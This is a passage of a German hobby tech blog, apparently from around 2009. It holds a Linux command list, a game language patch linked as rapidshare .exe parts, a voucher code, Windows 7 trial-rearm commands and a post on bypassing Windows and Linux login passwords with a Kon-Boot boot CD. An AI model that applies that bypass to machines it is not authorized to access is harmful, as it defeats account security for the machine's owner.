mv <Quelle> <Ziel> – Verschiebt von Quelle nach Ziel
rm <Datei> – Löscht Dateien
cp <Quelle> <Ziel> – Kopiert Datei(en)
chmod – Rechteverteilung für Dateien/Ordner. Am besten die Hilfe angucken
cat <Datei> – Gibt den Inhalt einer Datei aus
grep “<String>” <Datei> – Durchsucht eine Datei nach einem String
find <Pfad> <String> – Sucht ausgehen vom Pfad nach Dateien
ln –s <Pfad/Datei> <Linkname> – Erstellt einen Softlink
echo <String> – Gibt einen String aus
touch <Name> – Erstellt eine leere Datei
ps –a – Zeigt alle laufenden Prozesse an
kill <pid> – Einen Prozess beenden
clear – Bildschirminhalt löschen
telnet <Ip/Host> <Port> – Verbindet sich zu einem Rechner auf einem bestimmten Port
joe <Datei> – Lädt eine Datei in Joe (Texteditor; falls installiert>
mc – Startet den Midnight-Commander (falls instelliert)
gcc exp.c –o exp – Compiliert den Code exp.c und erstellt die Datei exp
./exp – führt die Datei exp aus

Das waren jetzt einiger ganz einfach Grundlagen. Aber ich muss das Rad nicht neu erfinden =D Es gibt genug Webseiten und Bücher, die sich ausführlich mit diese, Thema beschäftigen. Also bei Bedarf einfach ein bissel googeln und ihr werdet sich was brauchbares finden.
Die Umleitungsoperatoren funktionieren genau so wie bei Windows, also muss ich darauf nicht näher eingehen (einfach bei CMD noch mal gucken). Und Bash-Scripte werde ich jetzt auch nicht mit euch schreiben.

Posted in Linux Stuff, Win Stuff | No Comments »

Call of Duty: Modern Warfare 2 auf Englisch umstellen

Ich habe durch zufall einen Patch gefunden, der es ermöglicht Modern Warfare 2 auf englisch umzustellen (zumindestens nur die Sprache)

Einfach folgendes .rar Archiv entpacken und die CoDMW2EnglishPatch.exe starten. Es ersetzt dann alle Deutschen Sprachdateien mit den Englischen.

Download:

http://rapidshare.com/files/319899510/CoDMW2EnglishPatch.part01.rar.html
http://rapidshare.com/files/319899829/CoDMW2EnglishPatch.part02.rar.html
http://rapidshare.com/files/319899742/CoDMW2EnglishPatch.part03.rar.html
http://rapidshare.com/files/319901204/CoDMW2EnglishPatch.part04.rar.html
http://rapidshare.com/files/319904413/CoDMW2EnglishPatch.part05.rar.html
http://rapidshare.com/files/319905341/CoDMW2EnglishPatch.part06.rar.html
http://rapidshare.com/files/319906607/CoDMW2EnglishPatch.part07.rar.html
http://rapidshare.com/files/319905137/CoDMW2EnglishPatch.part09.rar.html
http://rapidshare.com/files/319905008/CoDMW2EnglishPatch.part08.rar.html

Posted in Games | No Comments »

5 Euro Gutschein für computeruniverse.net

Hier ist ein 5 Euro Gutschein für eine Erstbestellung bei http://www.computeruniverse.net

FWABSXD

Posted in Allgemein | No Comments »

Windows 7 Testversion verlängern

Hier eine Anleitung wie der Testzeitraum von Windows 7 legal um 120 Tage verlängert wird:

1.) Installiere Windows 7 ohne Product Key

2.) Benutze Windows 7 bis der das Aktivierungsdatum auf 0 (Null) Tage abgelaufen ist und die Aktivierungsmeldung angezeigt wird.

3.) Eingabeaufforderung öffnen (Start -> cmd -> ENTER drücken) und folgende Befehle nacheinander eingeben:

sysprep /generalize

slmgr.vbs rearm

rundll32 slc.dll,SLReArmWindows

slmgr /rearm

4.) Windows 7 ist nun wieder für 30 Tage freigeschaltet, dies kann man maximal 3 mal wiederholen —>120 tage !!!!!

Posted in Win Stuff | No Comments »

Kostenloser Online .pdf zu .doc converter

Hier gibts einen kostenlosen online pdf zu doc converter.

Link: pdftoword.com

Posted in Allgemein | No Comments »

Anmeldung umgehen bei Windows 7, Vista, XP, Gentoo, Debian, Ubuntu und Fedora

Ein einfacher hack um die Windows Anmeldung (oder Gentoo, Debian, Ubuntu oder Fedora) zu umgehen.

1. Downloaden der .iso-File (cd-konboot-v11-2in1)

2. .iso-File mit nero oder anderem Brennprogramm brennen.

3. CD beim starten des Rechners einlegen (Vorher im Bios überprüfen ob das erste Boot-Laufwerk das CD-ROM-Laufwerk ist)

4. Von CD starten und dann einfach nur abwarten. Die CD wird dann das Passwort vorübergehend löschen und nun ist es möglich mit dem “Administrator”-Benutzer in das System ein zu steigen. (Siehe Bild)

Das umgehen des Passwortes funktioniert auch bei Service Pack 3.

Posted in Allgemein | No Comments »